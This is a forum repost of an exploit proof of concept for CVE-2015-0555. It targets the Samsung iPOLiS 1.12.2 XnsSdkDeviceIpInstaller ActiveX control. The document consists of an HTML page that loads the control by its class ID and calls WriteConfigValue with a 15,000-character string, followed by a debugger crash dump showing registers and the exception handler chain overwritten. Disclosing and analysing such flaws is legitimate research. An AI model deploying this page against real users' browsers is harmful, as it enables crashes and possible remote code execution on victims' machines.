Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC

Aerosol · February 23, 2015

<!--
# Exploit Title: (0day)Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555)
# Date: 22/02/2015
# Exploit Author: Praveen Darshanam
# Vendor Homepage: *https://www.samsung-security.com/Tools/device-manager.aspx
# Version: Samsung iPOLiS 1.12.2
# Tested on: Windows 7 Ultimate N SP1
# CVE: 2015-0555
-->

<html>
<!--
Vulnerability found and PoC coded by Praveen Darshanam
http://blog.disects.com
CVE-2015-0555
targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
prototype  = "Function WriteConfigValue ( ByVal szKey As String ,  ByVal szValue As String ) As Long"
memberName = "WriteConfigValue"
progid     = "XNSSDKDEVICELib.XnsSdkDevice"
Operating System = Windows 7 Ultimate N SP1
Vulnerable Software = Samsung iPOLiS 1.12.2
CERT tried to coordinate but there wasn't any response from Samsung
-->
<head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>
<script>
var arg1 = "";
var arg2="praveend";

for (i=0; i<= 15000; i++)
{
    arg1 += "A";
}

target.WriteConfigValue(arg1 ,arg2);

</script>
</html>

<!--
#############Stack Trace####################
Exception Code: ACCESS_VIOLATION
Disasm: 149434  MOV AL,[ESI+EDX]

Seh Chain:
--------------------------------------------------
1   647C7D7D    mfc100.dll
2   647D0937    mfc100.dll
3   64E242CA    VBSCRIPT.dll
4   77B3E0ED    ntdll.dll


Called From                   Returns To
--------------------------------------------------
XNSSDKDEVICE.149434           41414141
41414141                      414141
414141                        3DA4C4
3DA4C4                        mfc100.647790C1
mfc100.647790C1               56746C75


Registers:
--------------------------------------------------
EIP 00149434
EAX 00003841
EBX 00609FB0 -> 0015A564
ECX 00003814
EDX 00414141
EDI 0000008F
ESI 0000008F
EBP 002BE5FC -> Asc: AAAAAAAAAAA
ESP 002BE564 -> 0000000C


Block Disassembly:
--------------------------------------------------
149423  XOR EDI,EDI
149425  XOR ESI,ESI
149427  MOV [EBP-8C],ECX
14942D  TEST ECX,ECX
14942F  JLE SHORT 00149496
149431  MOV EDX,[EBP+8]
149434  MOV AL,[ESI+EDX]      <--- CRASH
149437  CMP AL,2F
149439  JNZ SHORT 00149489
14943B  MOV ECX,EBX
14943D  TEST ESI,ESI
14943F  JNZ SHORT 0014944D
149441  PUSH 159F28
149446  CALL 0014F7C0
14944B  JMP SHORT 00149476


ArgDump:
--------------------------------------------------
EBP+8   00414141
EBP+12  003DA4C4 -> Asc: defaultV
EBP+16  647790C1 -> EBE84589
EBP+20  FFFFFFFE
EBP+24  646CBE5C -> CCCCCCC3
EBP+28  0000001C


Stack Dump:
--------------------------------------------------
2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00  [................]
2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41  [................]
2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]

-->

Source

Sign In

Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC

Recommended Posts

Aerosol

Join the conversation

Browse

Activity

Pages